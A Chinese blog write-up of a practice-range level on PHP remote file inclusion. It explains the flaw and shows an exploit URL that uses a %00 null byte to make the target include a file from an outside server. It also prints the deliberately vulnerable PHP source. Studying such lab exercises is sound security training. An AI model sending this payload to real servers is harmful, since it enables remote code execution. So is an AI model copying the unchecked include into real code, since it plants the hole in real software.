iwebsec-文件包含 05 远程文件包含绕过
1.iwebsec-sql注入 01 数字型注入2.iwebsec-sql注入 02 字符型注入3.iwebsec-sql注入 03 bool型注入4.iwebsec-sql注入 04 时间延迟型注入5.iwebsec-sql注入 05 报错型注入6.iwebsec-sql注入 06 宽字节字符型注入7.iwebsec-sql注入 07 空格过滤8.iwebsec-sql注入 08 大小写过滤注入9.iwebsec-sql注入 09 双写关键字绕过10.iwebsec-sql注入 10 双重url编码绕过11.iwebsec-sql注入 11 十六进制编码绕过12.iwebsec-sql注入 12 等价函数替换过滤13.iwebsec-sql注入 13 二次注入14.iwebsec-文件上传 01 前端JS过滤绕过15.iwebsec-文件上传 02 文件名过滤绕过16.iwebsec-文件上传 03 Content-Type过滤绕过17.iwebsec-文件上传 04 文件头过滤绕过18.iwebsec-文件上传 05 .htaccess19.iwebsec-文件上传 06 文件截断上传20.iwebsec-文件上传 07 条件竞争21.iwebsec-文件包含 01 本地文件包含22.iwebsec-文件包含 02 本地文件包含绕过23.iwebsec-文件包含 03 session本地文件包含24.iwebsec-文件包含 04 文件头过滤绕过
25.iwebsec-文件包含 05 远程文件包含绕过
26.iwebsec-文件包含 06 php://filter伪协议27.iwebsec-文件包含 07 php://input伪协议28.iwebsec-文件包含 08 php://input伪协议利用29.iwebsec-文件包含 09 file://伪协议利用30.iwebsec-文件包含 10 data://伪协议利用31.iwebsec-xss 01 反射型xss32.iwebsec-xss 02 存储型xss33.iwebsec-xss 03 DOM型xss34.iwebsec-xss 04 xss修复示例01、题目分析
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,
直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为文件包含。
在包含文件的过程中,如果文件能进行控制,则存储文件包含漏洞
如果服务器开启了远程访问文件功能,那么就可以利用文件包含漏洞下载存储在其他服务器上的文件来实现任意文件执行
这一题相比较于上一题只是给访问的文件添加后缀,因此我们只需要采用%00截断后面的后缀即可
02、文件包含
但是我的报错了,为啥,因为我的靶场是搭建在云服务器上的,上面的那个127.0.0.1是本机巡回地址,使用的前提是搭建网站的服务器和自己电脑处在同一局域网下,那么因此我只能换成外网服务器来进行任意文件上传
http://www.bdrwmy.cn:8001/fi/05.php?filename=http://114.115.167.13/1.txt%00
03、源码分析
<?php if(isset($_GET['filename'])){ // 检查是否设置了 'filename' 参数 $filename = $_GET['filename']; // 获取 'filename' 参数的值,并赋给 $filename 变量 include($filename . ".html"); // 包含指定的文件内容,文件名为参数值拼接上 ".html" 后缀 }else{ exit(); // 如果未设置 'filename' 参数,则退出脚本执行 } ?>
分类:
标签:
,
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步